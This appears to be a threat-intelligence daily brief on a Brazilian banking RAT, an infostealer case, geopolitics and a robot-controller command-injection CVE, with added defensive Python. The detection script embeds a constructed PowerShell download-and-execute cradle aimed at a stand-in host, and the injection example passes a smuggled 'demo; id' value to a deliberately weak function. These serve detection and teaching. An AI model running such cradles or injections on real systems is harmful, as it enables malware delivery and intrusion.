ZeroFox Daily Intelligence Brief - May 21, 2026
by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Banana RAT Campaign Targets Brazilian Banking Customers
- Ukraine-Linked Infostealer Operation Hits California Online Store
- Geopolitical Focus: U.S.-Cuba Tensions, Strait of Hormuz Standoff, and More
Banana RAT Campaign Targets Brazilian Banking Customers
Source: https://hackread.com/banana-rat-malware-fake-invoices-16-brazilian-banks/
What we know: Financially motivated threat group SHADOW-WATER-063 is reportedly targeting Brazilian banking customers with a remote access trojan (RAT) called Banana RAT. The campaign uses phishing links and fake invoice files distributed through WhatsApp and malicious domains to infect victims and steal money in real time.
Context: Victims are tricked into downloading a fake invoice file (Consultar_NF-e.bat) that launches hidden PowerShell commands and executes malware directly in memory using fileless techniques. Banana RAT gives attackers full remote control over infected systems, including screen monitoring, keystroke logging, and the ability to freeze user input during fraudulent banking activity.
Analyst note: The infrastructure used to generate hundreds of malware variants at scale may enable more resilient and scalable fraud campaigns against Brazilian financial institutions. The campaign could strengthen Latin American cybercrime ecosystems by increasing demand for malware obfuscation services, stolen banking access, and fraud-enablement tools.
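The execution chain described above (a downloaded .bat launching hidden PowerShell that stages the payload in memory) leaves a recognisable process-creation footprint. The following detection logic is an added example, not ZeroFox code: it scores PowerShell process-creation events for the indicators the brief names (batch-file parent, hidden window, encoded or download-cradle command lines). The JSON-lines schema, field names and sample events are constructed for illustration; the example.invalid host is a reserved, non-resolving stand-in.

```python
"""Score PowerShell process-creation events for the invoice-lure chain above.

Added example, not ZeroFox code. Event schema (JSON lines with the field names
below) and sample events are constructed; remap the fields to your Sysmon/EDR.
"""
import base64
import binascii
import json
import re

POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a base64 UTF-16LE script.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
BAT = r'cmd.exe /c "C:\Users\ana\Downloads\Consultar_NF-e.bat"'
# Constructed stage-2 cradle, encoded the way PowerShell expects (UTF-16LE, then base64).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
ENCODED_STAGE2 = base64.b64encode(STAGE2.encode("utf-16le")).decode()

# Constructed process-creation events (Sysmon Event ID 1 style, simplified).
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"host": "ws-01", "parent_image": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe",
     "image": CMD, "cmdline": BAT},
    {"host": "ws-01", "parent_image": CMD, "parent_cmdline": BAT, "image": PS,
     "cmdline": f'powershell.exe -nop -w hidden -ep bypass -c "{STAGE2}"'},
    {"host": "ws-02", "parent_image": r"C:\Windows\explorer.exe", "parent_cmdline": "explorer.exe",
     "image": PS, "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"host": "ws-03", "parent_image": CMD, "parent_cmdline": BAT, "image": PS,
     "cmdline": f"powershell.exe -w hidden -enc {ENCODED_STAGE2}"},
]]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16le", errors="ignore")


def score_event(event: dict):
    """Score one event; returns (score, matched indicator names).
    Only PowerShell children are scored: the cmd.exe/.bat stage alone is too noisy."""
    if not POWERSHELL.search(event.get("image", "")):
        return 0, []
    cmdline = event.get("cmdline", "")
    hits = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
    text = cmdline + "\n" + (decoded or "")  # inspect both raw and decoded text
    hits += [name for name, pat in INDICATORS.items() if pat.search(text)]
    if re.search(r"\.bat\b", event.get("parent_cmdline", ""), re.I):
        hits.append("bat_parent")  # launched by a batch file, as in the lure chain
    return len(hits), hits


def analyze(lines, threshold: int = 2):
    """Parse JSON-lines events and return alerts for those at or above the threshold."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        score, hits = score_event(event)
        if score >= threshold:
            alerts.append({"host": event.get("host"), "score": score,
                           "indicators": hits, "cmdline": event.get("cmdline", "")})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f"{alert['host']}: score={alert['score']} {alert['indicators']}")
```

The threshold of two indicators keeps a lone `-WindowStyle Hidden` or a lone encoded command (both common in legitimate automation) below the alert line, while the lure chain scores on the batch-file parent plus the cradle regardless of whether the payload is in clear text or base64.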
Ukraine-Linked Infostealer Operation Hits California Online Store
What we know: Ukrainian and U.S. authorities reportedly identified a Ukraine-linked suspect connected to an infostealer campaign targeting customers of a California-based online store between 2024 and 2025. The infostealer allegedly infected victim devices to steal browser sessions, credentials, cookies, and authentication tokens, which were then sold and used for fraudulent purchases.
Context: The operation compromised around 28,000 customer accounts, with attackers using roughly 5,800 of them to conduct unauthorized purchases worth approximately USD 721,000. Investigators reportedly seized computers, phones, storage devices, and cryptocurrency-related evidence during searches of the suspect’s residences, including infrastructure linked to the sale and management of stolen session data.
Analyst note: The operation is likely to have supplied underground marketplaces and Telegram-based cybercrime channels with infostealer logs, compromised accounts, and stolen e-commerce access. Victims likely remain exposed to account takeover, identity theft, fraudulent purchases, and follow-on phishing activity if the stolen logs remain in circulation and credentials have not been reset.
Geopolitical Focus: U.S.-Cuba Tensions, Strait of Hormuz Standoff, and More
- U.S. prosecutors charged former Cuban President Raúl Castro in connection with the 1996 shootdown of two civilian planes over Cuba that killed four people, including three American citizens. Meanwhile, the USS Nimitz entered the southern Caribbean as part of the Trump administration's pressure campaign against Cuba.
- The Islamic Revolutionary Guard Corps (IRGC) is enforcing a strict, multi-tiered clearance system on the Strait of Hormuz, charging up to USD 150,000 for safe passage. It prioritizes Russian, Chinese, and allied vessels, requiring others to undergo document reviews and physical inspections that can delay transit for up to a week.
- The IRGC warned on May 20, 2026, that any renewed attack on Iran would trigger widespread retaliation beyond the region. Nuclear and Strait of Hormuz negotiations remain stalled, with Tehran's latest proposal demanding war reparations and guaranteed uranium enrichment rights.
- President Donald Trump said on May 20, 2026, that he intends to speak directly with Taiwan's President Lai Ching-te, marking a significant shift in diplomatic norms. Taiwan's foreign ministry confirmed Lai would welcome the call. China, which views Taiwan as its own territory, has not yet formally responded.
- At least 21 people were killed in torrential rain across southern and central China. Schools, businesses, and transport services have been suspended, with authorities allocating USD 22 million in disaster relief.
DEEP AND DARK WEB INTELLIGENCE
Breachforums[.]rs user KrolikHacking: Untested threat actor "KrolikHacking" has advertised an alleged dataset associated with Tavily, a real-time search engine for AI agents, on dark web forum breachforums[.]rs. The actor claims that the dataset contains over one million user records, including their full names, email addresses, and hashed passwords, though no data samples were offered to prospective buyers.
VULNERABILITY AND EXPLOIT INTELLIGENCE
CVE-2026-8153: This is a command injection vulnerability in the Dashboard Server interface of Universal Robots PolyScope 5, an operating system (OS) for collaborative robots. The flaw enables an unauthenticated attacker with network access to execute arbitrary commands on the controller and gain full control of the robot system. Successful exploitation is very likely to result in manipulation of robot operations and potential physical safety hazards to personnel operating affected systems.
Affected products: PolyScope 5 versions prior to 5.25.1
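The vulnerability class named above, command injection in a network-facing management interface, comes down to caller-supplied text being spliced into a command that a shell interprets. The following is an added, generic illustration of the weak pattern beside its hardened form; it is not Universal Robots code, and since the brief gives no details of the actual flaw, nothing here reflects PolyScope internals. The `robotctl` tool, its `load` subcommand and the program-name grammar are hypothetical.

```python
"""Command injection: the weak pattern and the hardened form, side by side.

Added, generic example; not Universal Robots / PolyScope code. `robotctl`,
its `load` subcommand and the program-name grammar are hypothetical.
"""
import re
import subprocess

# Hypothetical allowlist grammar for a robot program name: must start with a
# letter or digit, then letters, digits, '_', '-' or '.'; no path separators,
# no whitespace, no shell metacharacters.
PROGRAM_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")


def build_command_vulnerable(program: str) -> str:
    """Weak pattern: caller text is spliced into one string meant for shell=True,
    so ';', '|', '$()' and backticks in `program` are interpreted by the shell."""
    return f"robotctl load {program}"


def validate_program_name(program: str) -> str:
    """Reject anything outside the allowlisted grammar before it reaches a command."""
    if not PROGRAM_NAME.fullmatch(program):
        raise ValueError(f"invalid program name: {program!r}")
    return program


def build_command(program: str) -> list[str]:
    """Hardened form: validated input, argv list, no shell. Whatever characters
    survive validation, the name is passed to the tool as a single argument."""
    return ["robotctl", "load", validate_program_name(program)]


def load_program(program: str, dry_run: bool = False) -> list[str]:
    """Build and (unless dry_run) execute the load command without a shell."""
    argv = build_command(program)
    if not dry_run:
        subprocess.run(argv, check=True)  # list form: no shell is involved
    return argv


if __name__ == "__main__":
    benign, hostile = "pick_place_v2", "demo; id"
    print("vulnerable string:", build_command_vulnerable(hostile))
    print("hardened argv:", load_program(benign, dry_run=True))
    try:
        load_program(hostile, dry_run=True)
    except ValueError as exc:
        print("rejected:", exc)
```

Two layers are deliberate: the allowlist stops unexpected input at the boundary with a clear error, and the argv list means that even a validation gap cannot turn input into a second command. Neither layer substitutes for requiring authentication on the interface itself, which is the other half of the exposure the advisory describes.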
Tags: DIB, tlp:green